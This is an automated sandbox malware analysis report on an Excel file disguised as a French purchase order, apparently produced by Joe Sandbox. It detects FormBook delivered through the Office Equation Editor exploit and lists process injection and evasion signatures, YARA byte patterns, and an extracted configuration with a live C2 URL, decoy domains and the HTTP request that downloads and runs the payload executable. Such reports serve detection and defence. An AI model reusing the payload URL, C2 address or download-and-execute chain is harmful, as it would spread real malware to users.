
Windows Analysis Report
BON DE COMMANDE POUR CHENOUFI AEK.xlsx

Overview

General Information

Sample Name: BON DE COMMANDE POUR CHENOUFI AEK.xlsx
Analysis ID: 626175
MD5: 981661fb35d158853f012f21aadd7b92
SHA1: 2ce93cbf7651c472a598b8756f5301275d95e27f
SHA256: 3084b6d063c6ec61503e90e6f2c61830ec915593fed9ddc719f67bc1ec24b49a
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign process
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2644 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 900 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2520 cmdline: "C:\Users\Public\vbc.exe" MD5: 5AF1C7DD89A535DEE51C3E28B4A74F8D)
      • bmexo.exe (PID: 1224 cmdline: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya MD5: FD42CBBC6D53AD34694C46731AABD852)
        • bmexo.exe (PID: 1820 cmdline: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya MD5: FD42CBBC6D53AD34694C46731AABD852)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • chkdsk.exe (PID: 792 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: A01E18A156825557A24A643A2547AA8C)
              • cmd.exe (PID: 2972 cmdline: /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup
Source / Rule / Description / Author / Strings
Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  • 0x18809:$sqlite3step: 68 34 1C 7B E1
  • 0x1891c:$sqlite3step: 68 34 1C 7B E1
  • 0x18838:$sqlite3text: 68 38 2A 90 C5
  • 0x1895d:$sqlite3text: 68 38 2A 90 C5
  • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source / Rule / Description / Author / Strings
Source: 6.0.bmexo.exe.400000.7.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 6.0.bmexo.exe.400000.7.raw.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 6.0.bmexo.exe.400000.7.raw.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  • 0x18809:$sqlite3step: 68 34 1C 7B E1
  • 0x1891c:$sqlite3step: 68 34 1C 7B E1
  • 0x18838:$sqlite3text: 68 38 2A 90 C5
  • 0x1895d:$sqlite3text: 68 38 2A 90 C5
  • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
Source: 6.0.bmexo.exe.400000.7.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 6.0.bmexo.exe.400000.7.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bc8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Exploits

          Source: Network Connection; Author: Joe Security; Data: DestinationIp: 103.156.91.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 900, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
          Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 900, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          No Snort rule has matched

          AV Detection

          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.freerenoadvice.com/ud5f/"], "decoy": ["makcoll.com", "mitrachocloud.com", "finikilspase.site", "vertriebmitherz.gmbh", "terapiasdelsinuips.com", "schoolmink.online", "slotgacor588.xyz", "zkf-lawyer.com", "daskocleaning.com", "baoxin-design.com", "hollywoodcuts.net", "animefnix.com", "trinityhomesolutionsok.com", "cfrhsw.xyz", "articrowd.com", "jlivingfurniture.com", "marmolsystem.com", "nudehack.com", "beam-birds.com", "cravensoft.com", "bjyunjian.com", "naturelleclub.com", "reece-family.net", "morarmail.com", "morgantownpet.supply", "recordanalytics.com", "factheat.online", "mcgillinvestigation.com", "tinyhouse.contact", "gpbrasilia.com", "jacobsclub.com", "theboemia.net", "balifoodfun.com", "alfonshotel.com", "spaceokara.com", "paraphras.com", "ruibaituobj.com", "rwbbrwe1.com", "turkishrepublik.com", "costumeshop.xyz", "minatexacess.com", "hathor-network.net", "02d1qp.xyz", "dadagrin.com", "lfsijin.com", "bupabii.site", "mydiga-angststoerung.com", "hayatseventeknoloji.com", "adv-cleaner.site", "ndsnus.com", "rebeccabarclaylpc.com", "eswpu.com", "babbleboat.com", "zvmsovsg.com", "quantumlab5.com", "venerems.com", "sh09.fyi", "maxpilesclinic.com", "luigilucioni.com", "yuttie.store", "tripnii.com", "topings33.com", "madetopraisehim.com", "tesladoge.info"]}
          Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsx; Virustotal: Detection: 38%
          Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsx; ReversingLabs: Detection: 26%
          Source: Yara match; File source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://103.156.91.153/fdcloudfiles/vbc.exe; Avira URL Cloud: Label: malware
          Source: www.freerenoadvice.com/ud5f/; Avira URL Cloud: Label: malware
          Source: http://103.156.91.153/fdcloudfiles/vbc.exe; Virustotal: Detection: 10%
          Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Joe Sandbox ML: detected
          Source: 6.0.bmexo.exe.400000.7.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.bmexo.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.bmexo.exe.170000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.bmexo.exe.400000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.bmexo.exe.400000.9.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits

          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Network connect: IP: 103.156.91.153 Port: 80
          Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\wxiwy\cojnmd\dyrz\70c437f178a447d5b5e03abf78ad86d5\khqwan\zzevlnko\Release\zzevlnko.pdb source: vbc.exe, 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp, bmexo.exe, 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000005.00000000.968231879.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000006.00000000.974589862.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, chkdsk.exe, 00000008.00000002.1174039918.0000000002887000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173217045.00000000003B3000.00000004.00000020.00020000.00000000.sdmp, nsmD99.tmp.4.dr, bmexo.exe.4.dr
          Source: Binary string: chkdsk.pdb source: bmexo.exe, 00000006.00000002.1050114953.0000000000030000.00000040.10000000.00040000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050401037.0000000000714000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: bmexo.exe, bmexo.exe, 00000006.00000003.981359909.0000000000800000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000003.979000602.00000000002B0000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1051582479.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000008.00000002.1173724762.0000000002500000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1050200391.0000000002090000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1051411235.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\Public\vbc.exe; Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405D7A
          Source: C:\Users\Public\vbc.exe; Code function: 4_2_004069A4 FindFirstFileW,FindClose,4_2_004069A4
          Source: C:\Users\Public\vbc.exe; Code function: 4_2_0040290B FindFirstFileW,4_2_0040290B

          Software Vulnerabilities

          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_035D056C ShellExecuteExW,ExitProcess,2_2_035D056C
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D050B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_035D048A LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D048A
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_035D0555 ShellExecuteExW,ExitProcess,2_2_035D0555
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_035D03FE URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D03FE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_035D03E5 ExitProcess,2_2_035D03E5
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_035D041A URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D041A
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_035D058A ExitProcess,2_2_035D058A
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_035D04A4 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D04A4
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 4x nop then pop edi 6_2_0041730E
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 4x nop then pop ebx 6_2_00406EA5
          Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 4x nop then pop edi 8_2_000A730E
          Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 4x nop then pop ebx 8_2_00096EA5
          Source: global traffic; TCP traffic: 192.168.2.22:49171 -> 103.156.91.153:80

          Networking

          Source: Malware configuration extractor; URLs: www.freerenoadvice.com/ud5f/
          Source: Joe Sandbox View; ASN Name: TWIDC-AS-APTWIDCLimitedHK
          Source: global traffic; HTTP traffic detected:
            HTTP/1.1 200 OK
            Date: Fri, 13 May 2022 15:07:42 GMT
            Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
            Last-Modified: Fri, 13 May 2022 06:57:17 GMT
            ETag: "40667-5dedf2f5fd4c5"
            Accept-Ranges: bytes
            Content-Length: 263783
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/x-msdownload
            Data Raw: (hex dump of the downloaded MZ/PE executable omitted)
          Source: global traffic; HTTP traffic detected:
            GET /fdcloudfiles/vbc.exe HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: 103.156.91.153
            Connection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D050B
          Source: unknown; TCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com2 equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exe
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exehhC:
          Source: EQNEDT32.EXE, 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exej
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exes
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.964387400.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.1003526577.0000000006450000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.993794779.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.994238368.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019525973.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006887265.0000000008611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 00000007.00000000.1007066480.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.993998682.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019426082.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.999156746.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1036163361.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1011925093.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987988330.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 00000007.00000000.1001945671.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989754024.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014187603.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
